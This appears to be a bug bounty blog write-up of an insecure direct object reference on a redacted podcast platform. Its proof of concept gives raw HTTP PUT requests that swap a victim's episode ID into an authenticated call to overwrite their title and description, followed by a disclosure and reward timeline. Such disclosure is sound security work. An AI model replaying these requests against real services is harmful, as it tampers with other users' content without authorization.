Saturday, February 13, 2021

Changing other users Episode title & description - IDOR Vulnerability in [REDACTED] (Write Up)

Good day everyone, hope you are doing great. 

It's been a while since I posted on this blog and today I will show you another simple vulnerability that I found few years ago on [REDACTED] (https://[redacted.com]), one of [REDACTED]'s acquisition company. The vulnerability allow me to change other users Episode titles & description without any user interaction.

So it was a cold & lazy Wednesday night that time when I started reading some of my old reports and decided to re-check some of it. I started with my old report on [REDACTED] which is a Cross Site Scripting that I reported few years ago and I noticed that there is no changes on that subdomain after the fix was released. So I fired up my recon tools to check other subdomains and directories of [REDACTED] and there is no interesting stuff found so I decided to check on their acquisitions and found an interesting one which is the [REDACTED] (https://[redacted.com]). so I fired up my recon tools again to check on for subdomains and directories since my method of testing is I started with the subdomains.

After a few hours of testing, I found multiple vulnerabilities including Stored XSS, Open Redirect, Reflected XSS, Session Management Issue and the most interesting one, the Insecure Direct Object Reference vulnerability. So long story short, I found some good bugs and reported it to them and unfortunately no one made it for a bounty since this domain is not on their scope (and yes! I'm aware of that, just trying my luck.) so I asked a permission to them for this write up so that I can share it with you guys.



--Proof of Concept--


User A (attacker id - e3mid0) & B (victim id - e3mhq4)

Go to https://[redacted.com]/dashboard/episode/e3mid0/metadata/edit (User A)

Click the "Update episode" button and capture the request (I used burp to capture the request)

Raw HTTP Request (Attacker)

PUT /api/podcastepisode/e3mid0 <attacker id>/metadata HTTP/1.1
Host: [redacted.com]
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: /
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
content-type: application/json
origin: https://[redacted.com]
Referer: https://[redacted.com]/dashboard/episode/e3mid0/metadata/edit
Content-Length: 661
Cookie: XXXXXXXXXXXX
Connection: close

{"isDraft":false,"podcastEpisodeIsExplicit":false,"podcastEpisodeType":"full","publishOn":null,"created":"2019-04-09T18:37:20.000Z","description":"<p>test1</p>","podcastEpisodeNumber":1,"podcastSeasonNumber":1,"safeDescription":"<p>test1</p>","title":"test1 for idor","doPublishExternally":true,"episodeAudios":[{"durationHMS":"10s","audioId":"a1ptlh","audioTransformationStatus":null,"caption":"Alley","color":"#fface7","created":"2016-12-02T22:25:38.000Z","doesHaveGeneratedVideo":false,"duration":10443,"key":"a1ptlh-0","sort":0,"userId":null,"url":"[redacted.com]}

Send the captured request to Repeater and change the episode id from attacker to victim id and change some of the information's like the title, description and etc...

Modified HTTP Request (Attacker)

In the modified request, the attacker can change the episode id in the URL request which can be found from the victim's episode. if you will say that it's hard to enumerate that kind of ID since it's a mix of random letters and numbers then no, the [REDACTED] episode ID of any users is visible to anyone that is why it is so easy to know your victim's ID.

PUT /api/podcastepisode/e3mhq4 <victim id>/metadata HTTP/1.1
Host:[redacted.com]
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: /
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
content-type: application/json
origin:https://[redacted.com]
Referer: https://[redacted.com]/dashboard/episode/e3mid0/metadata/edit
Content-Length: 661
Cookie: XXXXXXXXXXXX
Connection: close

{"isDraft":false,"podcastEpisodeIsExplicit":false,"podcastEpisodeType":"full","publishOn":null,"created":"2019-04-09T18:37:20.000Z","description":"<p>test1</p>","podcastEpisodeNumber":1,"podcastSeasonNumber":1,"safeDescription":"<p>test1</p>","title":"hacked!","doPublishExternally":true,"episodeAudios":[{"durationHMS":"10s","audioId":"a1ptlh","audioTransformationStatus":null,"caption":"Alley","color":"#fface7","created":"2016-12-02T22:25:38.000Z","doesHaveGeneratedVideo":false,"duration":10443,"key":"a1ptlh-0","sort":0,"userId":null,"url":"[redacted.com]}


Repeat the modified request thru repeater in burp and you will get a successful response (200)

Result: Victim's episode title and description can be manipulated or change.



--Report Timeline--


Title: Changing other REDACTED user's Episode title and description [IDOR]
Reported: May 30, 2018
Closed as Informative: June 1, 2018

Hello @evanricafort,

Thank you for your submission. Unfortunately, [redacted.com] is currently not in scope. Please feel free to resubmit this bug if it is still valid when the team plans to bring it into the scope of the program.

@xxxxx

Re-opened and rewarded: April 24, 2019 ($250)

Almost a year after when REDACTED added [redacted.com] on their scope and fortunately all my reports was validated and so this IDOR earned me a bounty of $250. kinda low for this issue because the domain is under their acquisition program but worth the wait since all in all the total bounty for all my reports for [redacted.com] is $1,150.


I hope you enjoy this write up. Stay safe and have a great day y'all!


"Not how long, but how well you have lived is the main thing."
 Seneca

No comments:

Post a comment